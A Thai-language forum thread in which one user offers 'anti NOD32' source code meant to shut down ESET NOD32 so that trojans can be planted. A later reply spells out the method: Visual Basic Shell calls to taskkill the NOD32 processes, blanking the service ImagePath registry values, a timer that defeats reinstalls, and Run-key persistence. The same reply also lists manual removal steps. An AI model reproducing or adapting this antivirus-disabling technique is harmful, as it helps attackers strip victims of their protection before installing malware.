แจก source code anti nod32

[burapagame]

ลองเอาไปเทสดูได้เลยงับ รับรองว่าใช้ได้ผลแน่นอน NOD32 หยุดทำงานทันที สามารถเอาโทรจันไปวางได้สบายๆ

**Hidden Content: To see this hidden content your post count must be 3 or greater.**

[akira]

ไม่หยุดทำงานนี่ครับ มันตัดการดาวน์โหลดไฟล์นี้ทันทีเลยครับ ไฟล์จะสามารถดาวน์โหลดได้เต็มที่ 92.38% เท่านั้น

[asylu3]

ผมคิดว่าเขาหมายถึงต้องนำ Code นี้มา Compile ที่เครื่องก่อน
โดยก่อนอื่นคุณก็ต้องปิด NOD32 ก่อนเพื่อการ Download ไฟล์นี้เพื่อทำการทดสอบนี้ครับ
ถ้าไม่แน่ใจก็โหลดลง VMWare ก็ำได้

[dexdee_04]

ดาวโหลดไฟล์ที่เป็นไวรัสทุกตัวต้องปิดตัวแสกนไวรัสก่อนทุกครั้งนะครับ เพื่อให้ดาวโหลดไฟล์ไวรัสอย่างเต็มประสิทธิภาพ และได้ผลชัดเจน

[akira]

สำหรับในเวอร์ชั่น 3.0.566.0
Web protection จะกันไม่ให้มีการแสดงผลหน้าเว็บใดๆ เลย แต่จะมีหน้าต่างเตือน บนพื้นสีขาวแทน
การดาวน์โหลดจะถูกตัดขาด และไฟล์ที่ถูกดาวน์โหลดบางส่วนจาก temp จะถูกย้ายมากักใน quarantine

แม้ว่าคุณจะพยายามเอาเข้าไปทางช่องทางอื่นแต่จะโดนการสแกนแบบ on access และ heuristic อยู่ดี

การปิด NOD32 เวอร์ชั่น 3 ให้ไม่สามารถติดต่อกับ kernel สามารถทำได้ แต่บอกไม่ได้ และไม่ใช่การใช้ม้า้โทรจัน
(จะบอกกับ NOD32 ambassador คนต่อไป เท่านั้น)

[neoclassic]

จากการ download มาศึกษาดูข้างในมีที่เป็น exe แล้ว พร้อมกับโค้ด โค้ดง่ายดี ใช้ Visual Basic เขียน และที่สำคัญ
หลักการนี้ใช้กับ Antivirus , FireWall หรือ โปรแกรมอะไรก็ได้ทุกประเภทเลย โค้ดไม่มีอะไรซับซ้อนหรือพิเศษ แต่ไอเดียสุดยอดเลย
หากเข้าใจหลักการ จะทำได้หมดเลย ความจริงจุดอ่อนของ antivirus และโปรแกรมทุกชนิด อยู่ที่ .......

วิธีการที่โค้ดนี้ใช้จัดการการกับ Service และ Process ของ Nod32 คือ

จัดการกับ process NOD32KRN.EXE และ NOD32KUI.EXE
ด้วยคำสั่ง taskkill /f /im
Shell "taskkill /f /im NOD32KRN.EXE", vbHide
Shell "taskkill /f /im NOD32KUI.EXE", vbHide

และที่เด็ดสุดในโค้ดนี้ คือ เขียนทับ registry
HKEY_LOCAL_MACHINE,"SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""
HKEY_LOCAL_MACHINE,"SYSTEM\CurrentControlSet001\Services\NOD32krn", "ImagePath", ""
HKEY_LOCAL_MACHINE,"SYSTEM\CurrentControlSet002\Services\NOD32krn", "ImagePath", ""

จุดสำคัญคือ "ImagePath", "" ค่าเดิมจะเป็น "ImagePath","C:\Program Files\Eset\nod32krn.exe"

ง่ายๆคือ ไม่ให้ nod32krn.exe start service ขึ้นมาก็จบชีวิต Nod32 แล้ว คือแค่ทำค่าให้เป็น ช่องว่าง "" ใครโหดๆ หน่อยก็ใช้คำสั่งลบทิ้งคู่กับไปเลย
โค้ดนี้ใช้ timer ด้วย ดังนั้นถึงลง nod32 ใหม่ ก็จะใช้ nod32 ไม่ได้ เพราะ timer จะทำงานไปเรื่อยๆ
ตราบใดที่ antinod32.exe อยู่ใน registry HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", "AntiNod32", "c:\windows\system32\antinod32.exe"
มันจะ start up antinod32.exe ทุกครั้งที่เปิดเครื่อง

ใคร ลอง run เล่นแล้วอยากเอาออก ด้วยตัวเอง
1. ปิด process ใน taskmanager ชื่อ antinod32.exe
2. ลบ c:\windows\system32\antinod32.exe (ใครลง windows ไว้ d,e,f ก็เปลี่ยนตาม)
3. ลบ start Up ใน registry HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run" ลบ string name "AntiNod32", "c:\windows\system32\antinod32.exe"
4.
ใน registry เดิม
HKEY_LOCAL_MACHINE,"SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""
HKEY_LOCAL_MACHINE,"SYSTEM\CurrentControlSet001\Services\NOD32krn", "ImagePath", ""
HKEY_LOCAL_MACHINE,"SYSTEM\CurrentControlSet002\Services\NOD32krn", "ImagePath", ""
ปรับค่าให้เป็นตามนี้
HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", "C:\Program Files\Eset\nod32krn.exe"
HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn", "ImagePath", "C:\Program Files\Eset\nod32krn.exe"
HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn", "ImagePath", "C:\Program Files\Eset\nod32krn.exe"


สรุป การทำลาย antivirus , firewall ไม่ยาก แต่!!! การทำให้ antivirus , firewall ตรวจไม่เจอมันยากและท้าทายกว่ามาก...